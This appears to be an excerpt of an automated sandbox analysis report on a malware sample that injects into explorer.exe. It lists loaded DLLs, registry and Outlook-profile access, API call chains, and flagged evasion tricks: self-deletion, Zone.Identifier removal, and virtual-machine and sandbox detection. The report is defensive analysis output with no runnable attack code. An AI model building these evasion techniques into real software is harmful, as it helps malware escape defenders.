                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03002198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,6_2_03002198
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_0040134A pushfd ; retf 0_2_00401353
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004012F2 pushfd ; retf 0_2_004012F3
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_3_05D89719 push eax; ret 6_3_05D89725
                    Source: C:\Windows\explorer.exeCode function: 7_2_0098A055 push es; iretd 7_2_0098A05D
                    Source: C:\Windows\explorer.exeCode function: 7_2_00981405 push esi; ret 7_2_00981407
                    Source: C:\Windows\explorer.exeCode function: 7_2_009847A7 push esp; iretd 7_2_009847A8
                    Source: C:\Windows\explorer.exeCode function: 7_2_009814D4 push esi; ret 7_2_009814D6
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_008338A7 push esp; iretd 8_2_008338A8
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_008394E6 push edx; ret 8_2_008394E7
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0083967E push ds; retf 8_2_00839680
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00388EEF push edi; ret 9_2_00388EF0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003887CE push es; ret 9_2_00388A18
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA14D4 push esi; ret 10_2_00CA14D6
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA1405 push esi; ret 10_2_00CA1407
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00843417 push esp; iretd 11_2_00843418
                    Source: C:\Windows\explorer.exeCode function: 15_2_00F714D4 push esi; ret 15_2_00F714D6
                    Source: C:\Windows\explorer.exeCode function: 15_2_00F745A7 push esp; iretd 15_2_00F745A8
                    Source: C:\Windows\explorer.exeCode function: 15_2_00F71405 push esi; ret 15_2_00F71407
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D3627 push esp; iretd 16_2_006D3628
                    Source: C:\Windows\explorer.exeCode function: 17_2_0043AC8D push esp; iretd 17_2_0043AC95
                    Source: C:\Windows\explorer.exeCode function: 17_2_0043AAD2 push ebp; iretd 17_2_0043AAD3
                    Source: C:\Windows\explorer.exeCode function: 17_2_004314D4 push esi; ret 17_2_004314D6
                    Source: C:\Windows\explorer.exeCode function: 17_2_00431405 push esi; ret 17_2_00431407
                    Source: C:\Windows\explorer.exeCode function: 17_2_00434817 push esp; iretd 17_2_00434818
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: section name: .text entropy: 6.9994558883301154
                    Source: rrrrcve.1.drStatic PE information: section name: .text entropy: 6.9994558883301154
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rrrrcveJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rrrrcveJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeJump to behavior
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rrrrcve:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,9_2_00383862
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Checks if the current machine is a virtual machine (disk enumeration)
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Contains functionality to compare user and computer (likely to detect sandboxes)
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,9_2_00383862
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-882
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, 00000000.00000002.1743649445.00000000005E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,9_2_00383862
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 465Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1664Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 731Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 373Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 366Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2786Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 914Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1126Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 902Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 552Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7220Thread sleep count: 465 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7228Thread sleep count: 1664 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7228Thread sleep time: -166400s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7224Thread sleep count: 731 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7224Thread sleep time: -73100s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7712Thread sleep count: 373 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7712Thread sleep time: -37300s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7704Thread sleep count: 222 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7708Thread sleep count: 366 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7708Thread sleep time: -36600s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7228Thread sleep count: 2786 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7228Thread sleep time: -278600s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7656Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7692Thread sleep count: 914 > 30Jump to behavior
